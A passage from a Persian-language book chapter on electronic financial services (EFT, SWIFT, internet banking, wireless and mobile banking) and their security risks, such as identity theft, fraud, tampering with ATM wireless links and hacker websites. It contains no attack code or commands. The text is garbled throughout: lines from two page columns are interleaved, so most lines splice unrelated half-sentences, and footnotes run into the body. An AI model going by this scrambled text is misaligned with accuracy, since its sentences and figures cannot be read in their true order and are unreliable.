‫ﻗﺪﻳﻤﻲﺗﺮﻳﻦ ﺻﻮﺭﺕ ﺗﺒﺎﺩﻝ ﭘﻮﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺍﻭﺍﻳـﻞ‬ ‫ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﭼـﻪ ﺑـﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻭ ﭼـﻪ ﺑـﺎ‬
‫ﺩﻫﺔ ‪ ۱۹۶۰‬ﻣﺮﺳﻮﻡ ﺷﺪ‪ .‬ﺩﺭ ﻣﻘﻴﺎﺱ ﺟﻬﺎﻧﻲ ﻣﻘﺪﺍﺭ ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ‬ ‫ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﺭﺷــﺪ ﺳــﺮﻳﻌﻲ ﺩﺍﺷــﺘﻪﺍﻧــﺪ‪ .‬ﻛــﺸﻮﺭﻫﺎ ﻭ‬
‫‪ EFT‬ﺩﺭ ﺩﺍﺧﻞ ﻭ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺧﺰﺍﻧـﺔ ﺍﻳـﺎﻻﺕ‬ ‫ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺑﺎ ﺭﻭﻧﺪ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ‬
‫ﻣﺘﺤــﺪﻩ ﻣﻴــﺰﺍﻥ ﺁﻧــﺮﺍ ﺣــﺪﻭﺩ ‪ ۲‬ﺗﺮﻳﻠﻴــﻮﻥ ﺩﻻﺭ ﺩﺭ ﺭﻭﺯ ﻳــﺎ ‪۷۰۰‬‬ ‫ﻓﻨﺎﻭﺭﻳﻬــﺎ ﻧــﻪ ﺗﻨﻬــﺎ ﻛــﺸﻮﺭﻫﺎﻱ ﻋــﻀﻮ ﺩﺭ ﺷــﺒﻜﻪ ﺭﺍ ﮔــﺴﺘﺮﺵ‬
‫ﺗﺮﻳﻠﻴﻮﻥ ﺩﻻﺭ ﺩﺭ ﺳﺎﻝ ﺗﺨﻤـﻴﻦ ﺯﺩﻩ ﺍﺳـﺖ‪ .‬ﺑﺨـﺶ ﻋﻤـﺪﻩﺍﻱ ﺍﺯ‬ ‫ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳﺪﻱ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﻮﺟﻮﺩ‬
‫ﻲ ﺷــﺒﻜﺔ ‪ SWIFT‬ﺑﻮﺳــﻴﻠﺔ ﺧﻄــﻮﻁ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ‬ ‫‪ EFT‬ﺑــﺎﻧﻜ ﹺ‬ ‫ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺍﺯ ﺍﻭﺍﺳﻂ ﺩﻫﺔ ‪ ۹۰‬ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ ﺻﻨﻌﺖ ﺑﺎﻧﻜﺪﺍﺭﻱ‬
‫ﻣﺎﻫﻮﺍﺭﻩ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿـﺮ ﺣـﺪﻭﺩﹰﺍ ﻧﻴﻤـﻲ ﺍﺯ ‪۲۰۰‬‬ ‫ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺭﺿﺎﻳﺘﻤﻨﺪﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﻭﻱ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ‬
‫ﻛﺸﻮﺭ ﺩﻧﻴﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺷﺒﻜﻪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﺑﺰﺭﮒ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ‬ ‫ﺗﻤﺮﻛﺰ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﻨﺠـﺮ ﺑـﻪ ﻛـﺎﻫﺶ‬
‫ﺧﻄﻮﻁ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ ﺗﺄﻣﻴﻦ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﻏﺎﻟﺐ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺍﺯ‬ ‫ﻫﺰﻳﻨﻪﻫﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺷﺒﻜﺔ ﺍﻳﻨﺘﺮﻧﺖ ﻋـﻼﻭﻩ ﺑـﺮ‬
‫ﻟﺤﺎﻅ ﺍﻗﺘﺼﺎﺩﻱ ﺗﻮﺳﻌﻪ ﻳﺎﻓﺘﻪ ﻫـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑﺎﻋـﺚ‬ ‫ﺻﺮﻓﻪﺟﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺛﺎﺑـﺖ ﺗﻮﺳـﻌﻪ ﻭ ﻧﮕﻬـﺪﺍﺭﻱ ﺷـﻌﺐ‪،‬‬
‫ﺗﺮﺍﻓﻴﻚ ﺯﻳﺎﺩ ﻭ ﺣﺠﻢ ﻭﺳﻴﻊ ﻋﻤﻠﻴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ﻣﻲ ﺷﻮﺩ؛ ﻭ ﺍﻳـﻦ‬ ‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺍﺣﻞ ﺍﺿـﺎﻓﻪ ﺭﺍ ﻧﻴـﺰ ﺣـﺬﻑ ﻛـﺮﺩﻩ ﻭ ﻫﺰﻳﻨـﻪﻫـﺎ ﺭﺍ‬
‫ﻣﺴﺌﻠﻪ ﺍﺯ ﻧﻘﻄﻪﻧﻈﺮ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺩﻏﺪﻏﺔ ﺑـﺰﺭﮒ‬ ‫ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻧﺠﺎﻡ ﻳﻚ ﺗﺮﺍﻛﻨﺶ ﻋـﺎﺩﻱ ﺍﺯ ﻃﺮﻳـﻖ ﻳـﻚ‬
‫ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ‪ ١٤١.‬ﺗﺎ ﺳﺎﻝ ‪ ۲۰۰۵‬ﺳﻬﻢ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ‬ ‫ﺷﻌﺒﻪ ﻳﺎ ﺗﻤﺎﺱ ﺗﻠﻔﻨﻲ ﻫﺰﻳﻨﻪﺍﻱ ﻣﻌﺎﺩﻝ ﻳـﻚ ﺩﻻﺭ ﺁﻣﺮﻳﻜـﺎ ﺩﺍﺭﺩ‪،‬‬
‫ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺻﻨﻌﺘﻲ ﺍﺯ ‪ %۸،۵‬ﺑﻪ ‪ %۵۰‬ﻭ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ‬ ‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻧﺠﺎﻡ ﻫﻤﺎﻥ ﺗـﺮﺍﻛﻨﺶ ﺑـﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻫﺰﻳﻨـﻪﺍﻱ‬
‫ﺭﺷﺪ ﺍﺯ ‪ %۱‬ﺑﻪ ‪ %۱۰‬ﺧﻮﺍﻫﺪ ﺭﺳـﻴﺪ‪ .‬ﺩﺭﺻـﻮﺭﺕ ﺑﺮﻗـﺮﺍﺭﻱ ﺑﻬﺘـﺮ‬ ‫ﻣﻌﺎﺩﻝ ‪ ۰،۰۲‬ﺩﻻﺭ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﻫﺰﻳﻨﻪﻫﺎﻱ ﻧﺎﺯﻝ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ‬
‫ﺍﺗﺼﺎﻻﺕ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﺮﺍﻛﻨـﺸﻬﺎﻱ‬ ‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎﻋﺚ ﺭﻭﺍﺝ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺧـﺪﻣﺎﺕ ﻣﺒﺘﻨـﻲ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۵‬ﺗﺎ ‪ %۲۰‬ﺍﻓـﺰﺍﻳﺶ ﻳﺎﺑﻨـﺪ؛ ﻛـﻪ‬ ‫ﺑﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ‬
‫ﺭﻗﻤـــﻲ ﺑـــﻴﺶ ﺍﺯ ﺷـــﺶ ﺗﺮﻳﻠﻴـــﻮﻥ ﺩﻻﺭ ﻣﻌﺎﻣﻠـــﺔ ﺍﻳﻨﺘﺮﻧﺘـــﻲ‬ ‫ﺧﺪﻣﺎﺕ ﺻﻨﻌﺘﻲ ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ‬
‫‪١٤٣‬‬
‫ﺗﺠﺎﺭﺕ‪-‬ﺑﻪ‪-‬ﺗﺠﺎﺭﺕ )‪ ١٤٢(B2B‬ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬ ‫ﺑﺮﺯﻳﻞ ﻫﻤﭽﻮﻥ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﮔﺴﺘﺮﺵ ﻳﺎﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺑـﻪ ﻋﻠـﺖ‬
‫ﺩﺭ ﭘﻲ ﺭﺷﺪ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻚ ﻧﮕـﺮﺵ ﺩﻳﮕـﺮ ﻧﻴـﺰ‬ ‫ﻋﺪﻡ ﻭﺟﻮﺩ ﺯﻳﺮﺳـﺎﺧﺖ ﻣﻨﺎﺳـﺐ ﺧﻄـﻮﻁ ﺩﺭ ﻏﺎﻟـﺐ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺷﻜﻞﮔﻴﺮﻱ ﺍﺳﺖ‪ :‬ﮔﺴﺘﺮﺵ ﺭﻭﺯﺍﻓﺰﻭﻥ ﻛﺎﺭﺑﺮﺩ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬ ‫ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ‪ ،‬ﺑﻴـﺸﺘﺮ ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺧـﺪﻣﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺩﺭ‬
‫ﺑﻲﺳﻴﻢ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‪ .‬ﺍﻳﻦ ﺭﺳـﺎﻧﺔ‬ ‫ﺑﺴﺘﺮﻫﺎﻱ ﺑﻲﺳﻴﻢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩﻩﺍﻧﺪ ﺗﺎ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﻧﺴﺒﺘﹰﺎ ﺟﺪﻳﺪ ﺑﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﺗﺒـﺪﻳﻞ ﺷـﺪﻥ ﺑـﻪ ﺭﺳـﺎﻧﺔ ﺍﺻـﻠﻲ‬ ‫ﮔﺴﺘﺮﺵ ﺩﺍﺩﻩ ﺑﺎﺷﻨﺪ‪ .‬ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺍﻳﻦ ﻭﺍﻗﻌﻴﺘﻬـﺎ‪ ،‬ﭼﻬـﺎﺭ ﮔـﺮﺍﻳﺶ‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳـﺖ‪ .‬ﺗﺤـﻮﻝ‬ ‫ﻣــﺮﺗﺒﻂ ﺑــﺎ ﻓﻨــﺎﻭﺭﻱ ﺟﺪﻳــﺪ ﺩﺭ ﺻــﻨﻌﺖ ﺍﻳﺠــﺎﺩ ﺷــﺪﻩ ﺍﺳــﺖ‪:‬‬
‫ﻛﺴﺐ ﻭ ﻛﺎﺭﻫﺎ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﻏﺬﻱ ﺑﻪ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬ ‫ﺑﺮﻭﻧﺴﭙﺎﺭﻱ‪ ،‬ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ‪ ،‬ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻳﻜﭙﺎﺭﭼـﻪ‪ ،‬ﻭ ﺭﻭﺷـﻬﺎﻱ‬
‫‪١٣٦‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺑﺴﻴﺎﺭ ﻋﻤﻴﻖ ﺑﻮﺩﻩ ﺍﺳـﺖ‪ .‬ﻫﻤﻴﻨﻄـﻮﺭ ﻛـﻪ ﺑـﺴﺘﺮ ﺍﻧـﻮﺍﻉ‬ ‫ﺟﺪﻳﺪ ﭘﺮﺩﺍﺧﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪.‬‬
‫ﺧﺪﻣﺎﺕ ﺍﺯ ﺧﻄﻮﻁ ﺯﻣﻴﻨﻲ ﺑـﻪ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺑـﺎ ﺍﻣﻜـﺎﻥ‬

‫‪137‬‬ ‫‪Electronic Funds Transfers‬‬


‫‪138‬‬ ‫‪Electronic Data Interchange‬‬ ‫‪ ۱۳۵‬ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﺗﺤﻠﻴﻞ ﺩﻗﻴﻘﺘﺮ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ‬
‫‪139‬‬ ‫‪Electronic Benefits Transfers‬‬ ‫ﻣﻨﺒـﻊ ﺯﻳـﺮ ﻧﻮﺷـﺘﺔ ‪ ،T. Kellerman ،T. Glaessener‬ﻭ ‪V.‬‬
‫‪140‬‬ ‫‪Electronic Trade Confirmation‬‬
‫‪141‬‬ ‫‪Dr. Joseph N. Pelton, "Satellite‬‬ ‫‪) McNevin‬ﺳﺎﻝ ‪ (۲۰۰۲‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪Communications 2001: The Transition to‬‬ ‫‪"E-Security Risk Mitigation for Financial‬‬
‫‪Mass-Consumer Markets, Technologies, and‬‬ ‫"‪Transactions‬‬
‫‪Systems".‬‬ ‫‪136 Gilbride, Edward. Emerging Bank Technology‬‬
‫‪142 Business To Business‬‬ ‫‪and the Implications for E-crime Presentation,‬‬
‫‪143 Jupiter Communications, 2001‬‬ ‫‪September 3, 2001‬‬
‫‪١٨٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺳﺮﻗﺖ ﻫﻮﻳﺖ‪ ،‬ﺗﺒﺎﺩﻝ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺟﻌﻠـﻲ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺧـﺎﺫﻱ‬ ‫ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮ ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﺛﺮﺍﺕ ﻣﻨﻔـﻲ ﺍﻳـﻦ ﭘﺪﻳـﺪﻩ ﻧﻴـﺰ‬
‫ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﮔﺴﺘﺮﺵ ﻣﻲﻳﺎﺑﺪ‪.‬‬
‫ﺩﺳ ـﺘﮕﺎﻫﻬﺎﻱ ﺳــﻴﺎﺭ ﺍﻣــﺮﻭﺯﻩ ﺑﻌﻨــﻮﺍﻥ ﻟﺒــﺔ ﺩﺭﺣــﺎﻝ ﭘﻴــﺸﺮﻓﺖ‬
‫ﺏ‪ .‬ﻣﺨﺎﻃﺮﺍﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﻬﺎﻥ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۰‬ﺗﻨﻬﺎ ﻳﺎﺯﺩﻩ‬
‫ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ‬ ‫ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻙ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺗﻤﺎﻡ ﺩﻧﻴﺎ ﻭﺟﻮﺩ ﺩﺍﺷـﺖ‪ ١٤٤.‬ﺗـﺎ‬
‫ﺩﺭ ﻛﻨﺎﺭ ﻓﻮﺍﻳﺪ ﺯﻳﺎﺩ ﻓﻨﺎﻭﺭﻱ ﺟﺪﻳﺪ‪ ،‬ﻣﺨﺎﻃﺮﺍﺗﻲ ﻫﻢ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ‬ ‫ﺳﺎﻝ ‪ ۱۹۹۹‬ﻭ ﺑﺎ ﮔﺴﺘﺮﺵ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺍﻳـﻦ ﺭﻗـﻢ ﺑـﻪ‬
‫ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﻓﻨﺎﻭﺭﻱ ﺭﻭﺷﻬﺎﻱ ﺟﺪﻳﺪ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﺳـﺮﻗﺖ ﺭﺍ‬ ‫ﭼﻴﺰﻱ ﻓﺮﺍﺗﺮ ﺍﺯ ﭘﺎﻧﺼﺪ ﻣﻴﻠﻴﻮﻥ ﺭﺳﻴﺪ ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻧﻴﺰ ﺗﻘﺮﻳﺒـﹰﺎ‬
‫ﻧﻴﺰ ﺗـﺴﻬﻴﻞ ﻣـﻲﻛﻨـﺪ‪ .‬ﺍﻛﻨـﻮﻥ ﻣـﺴﺎﺋﻠﻲ ﭼـﻮﻥ ﺟﻌـﻞ ﻫﻮﻳـﺖ‪،‬‬ ‫ﺩﻭ ﺑﺮﺍﺑﺮ ﺁﻥ ﻣﻘﺪﺍﺭ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺭﺳﻲ ﺁﻣﺎﺭ ﻣﺸﺎﺑﻪ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ‬
‫ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻭ ﭼﺎﭖ ﺗـﺼﺎﻭﻳﺮ ﺍﻭﺭﺍﻕ ﺑﻬـﺎﺩﺍﺭ ﺑـﺎ ﻛﻴﻔﻴـﺖ‬ ‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‪ ،‬ﺟﻬﺸﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺳـﻴﺎﺭ‬
‫ﻋــﺎﻟﻲ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻳﻨﺘﺮﻧﺘــﻲ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﺑﺰﺍﺭﻫــﺎ ﻭ ﺑــﺴﺘﺮﻫﺎﻱ‬ ‫ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻩ ﺭﺍ ﺑﺨـﻮﺑﻲ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ‪ ١٤٥.‬ﻛـﺸﻮﺭ ﻛــﺎﻣﺒﻮﺝ‬
‫ﭼﻨــﺪﻣﻨﻈﻮﺭﻩ ﺍﻧﺠــﺎﻡ ﺁﻧﻬــﺎ ﺭﺍ ﺗــﺴﻬﻴﻞ ﻣــﻲﻛﻨﻨــﺪ‪ .‬ﺑــﺎ ﮔــﺴﺘﺮﺵ‬ ‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﭘﺲ ﺍﺯ ﺣﺪﻭﺩ ‪ ۲۰‬ﺳﺎﻝ ﺟﻨﮓ ﺷـﻬﺮﻱ ﺷـﺒﻜﺔ ﺧﻄـﻲ‬
‫ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺗﻠﻔﻨﻲ‪ ١٤٦‬ﻛﻪ ﺩﺭ ﻣﻨﺎﻃﻖ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ‬ ‫ﺛﺎﺑﺖ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩ ﺑﻮﺩ‪ ،‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ‬
‫ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﻮﻝ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪ ،‬ﺑﺰﻫﻜﺎﺭﺍﻥ ﻗﺎﺩﺭﻧﺪ ﻛـﻪ‬ ‫ﺗﻮﺍﻧﺴﺖ ﺑﺎﺭ ﺩﻳﮕـﺮ ﺍﺗـﺼﺎﻻﺕ ﺧـﻮﺩ ﺭﺍ ﺑﺮﻗـﺮﺍﺭ ﻛﻨـﺪ‪ .‬ﺩﺭ ﺧـﻼﻝ‬
‫ﻳﻜﺴﺎﻝ ﺑﻌﺪ ﺍﺯ ﺁﻏﺎﺯ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ‪ ،‬ﺗﻌﺪﺍﺩ ﻣﺸﺘﺮﻛﺎﻥ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺍﺗﺼﺎﻝ ﺑﻲﺳﻴﻢ ﻣﻴﺎﻥ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ ﻭ ﺑﺎﻧـﻚ ﻣـﺎﺩﺭ ﺭﺍ‬


‫ﺩﺳﺘﻜﺎﺭﻱ ﻧﻤﻮﺩﻩ ﻭ ﻛﻠﻴﺔ ﺗﺒـﺎﺩﻻﺕ ﻭﺭﻭﺩﻱ ﻭ ﺧﺮﻭﺟـﻲ ﺩﺳـﺘﮕﺎﻩ‬ ‫ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ ﺍﺯ ﻣﺸﺘﺮﻳﺎﻥ ﺗﻠﻔﻨﻬﺎﻱ ﺛﺎﺑﺖ ﭘﻴﺸﻲ ﮔﺮﻓﺖ‪ .‬ﻛﺎﻣﺒﻮﺝ‬
‫ﺧﻮﺩﭘﺮﺩﺍﺯ ﺗﻠﻔﻨﻲ ﺭﺍ ﺗﺴﺨﻴﺮ ﻛﻨﻨﺪ‪ .‬ﻫﻨﺮ ﻧﻔﻮﺫ ﺑﺮﺧﻂ ﺩﺭ ﺍﺑﺘـﺪﺍ ﻳـﻚ‬ ‫ﺩﺭﺣﺎﻟﻴﻜﻪ ﻳﻜﻲ ﺍﺯ ﻛﻤﺘﺮﻳﻦ ﺩﺭﺁﻣـﺪﻫﺎﻱ ﺳـﺮﺍﻧﺔ ﺩﻧﻴـﺎ ﺭﺍ ﺩﺍﺭﺩ‪ ،‬ﺩﺭ‬
‫ﺗﺨﺼﺺ ﭘﻴﭽﻴﺪﻩ ﺑـﻮﺩ‪ ،‬ﺍﻣـﺎ ﻋـﺼﺮ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﺯﻣﻴﻨـﻪ ﺭﺍ ﺑـﺮﺍﻱ‬ ‫ﺯﻣﻴﻨﺔ ﮔﺴﺘﺮﺵ ﻋﻤﻮﻣﻲ ﺗﻠﻔﻦ ﺍﺯ ‪ ۳۱‬ﻛﺸﻮﺭ ‪ -‬ﺍﺯ ﺟﻤﻠـﻪ ﺑﻌـﻀﻲ‬
‫ﮔﺴﺘﺮﺵ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳﺮﺯﻣﻴﻨﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ‪ -‬ﻛـﻪ‬ ‫ﻛﺸﻮﺭﻫﺎ ﻛﻪ ﺩﺭﺁﻣﺪ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﺁﻥ ﺩﺍﺭﻧﺪ ‪ -‬ﭘﻴـﺸﻲ ﮔﺮﻓﺘـﻪ‬
‫ﺍﻣﺮﻭﺯﻩ ﺑﺎ ﺍﺭﺍﺋﻪ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﻧﻔـﻮﺫ ﺑـﻪ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ‬ ‫ﺍﺳﺖ‪ .‬ﻛﺸﻮﺭﻫﺎﻱ ﺩﻧﻴﺎ ﺑﺠﺎﻱ ﺻﺮﻑ ﻣﻘﺎﺩﻳﺮ ﻓﺮﺍﻭﺍﻥ ﻣﻨﺎﺑﻊ ﻭ ﺯﻣﺎﻥ‬
‫ﺍﻗﺘﺼﺎﺩﻱ‪ ،‬ﺍﺯ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲ ﻛﻨﻨـﺪ ‪-‬‬ ‫ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺧﻄﻲ ﺛﺎﺑﺖ ﺟﻬﺖ ﺗﺴﻬﻴﻞ ﺍﺭﺗﺒﺎﻃـﺎﺕ‪،‬‬
‫ﻓــﺮﺍﻫﻢ ﻧﻤــﻮﺩﻩ ﺍﺳــﺖ‪ .‬ﺑﻌﻨــﻮﺍﻥ ﻣﺜــﺎﻝ ﭘﺎﻳﮕﺎﻫﻬــﺎﻳﻲ ﻣﺎﻧﻨــﺪ‬ ‫ﺍﻳﻦ ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﺳﻴﻤﻲ ﺭﺍ ﺑﺎ ﺑﺮﺟﻬﺎﻱ ﺍﺭﺯﺍﻥ ﺗﻠﻔـﻦ ﻫﻤـﺮﺍﻩ ﻛـﻪ‬
